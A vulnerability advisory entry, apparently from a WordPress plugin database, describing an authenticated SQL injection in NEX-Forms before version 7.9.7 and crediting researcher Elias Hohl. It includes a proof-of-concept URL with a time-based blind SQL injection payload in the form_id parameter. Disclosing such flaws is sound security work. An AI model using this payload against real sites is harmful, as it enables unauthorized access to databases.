WordPress Plugin Vulnerabilities

NEX-Forms < 7.9.7 - Authenticated SQLi

Description

The plugin does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.

Proof of Concept

https://example.com/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Elias Hohl
Submitter
Elias Hohl
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-09-06 (about 1 years ago)
Last Updated
2022-09-06 (about 1 years ago)

Other